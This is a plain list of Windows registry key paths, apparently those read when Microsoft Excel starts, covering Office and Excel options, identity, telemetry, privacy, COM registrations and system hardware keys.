HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\EnableProcessAslrPolicy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\GridLineScaleByDpi
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RenderForMonitorDpi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\~MHz
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\MachineId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemFamily
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemSKU
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MotherboardUUID
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookAutoRecoverDirty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSystemSeparators
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ThousandsSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DecimalSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ShowLensTooltip
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableTouchUIA
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Ace_OdbcCurrentUser\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core\Order
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en-US
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Intl\Order
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Ids\en
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Migration\InstallationPath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Office\OfficeInstallationPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MonitorTopologyFingerprint
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LargeOperationCellCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options95
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OptionFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDECleaned
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDEAllowed
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SortCaseSensitive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CaretTracksSemiSelect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableFourDigitYearDisplay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CfDDELink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableBestFitMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EmbedUpdateRemoteReferences
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableMTP
HKEY_CURRENT_USER\Software\Microsoft\CTF\Disable Thread Input Manager
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}\Enable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToNexus
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableOneAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableExchangeOnPremModernAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAuthentication
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\IdentityRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Canary
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAADWAM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\SpoAuthenticatorHeaderEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\IsOnRequestCompletedActivityEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableMSAWAM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountWamAad
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RunAs
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ActivateAtStorage
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ROTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\AppIDFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\MGOTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\SRPTrustLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\DllSurrogate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\ErrorDialog
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Fod
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\FodConservativeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\EnablePhoneOnlyAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ConfigEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryClientId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableOfficeBetaHeader
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\EnableHttpAccessTypeAutomaticProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableTelemetryGrf
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\SchemaVersion
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InProcServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RetailDemo
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.System.Profile.RetailInfo\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\SendTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SendTelemetryTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\FRESettingsMigrated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\ControllerConnectedServicesEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ControllerConnectedServicesStateTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DownloadContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RequiredDiagnosticDataNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalDiagnosticDataConsentVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RoamingNotificationState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ServerReachabilityTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseDeviceLevelConnectivity
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
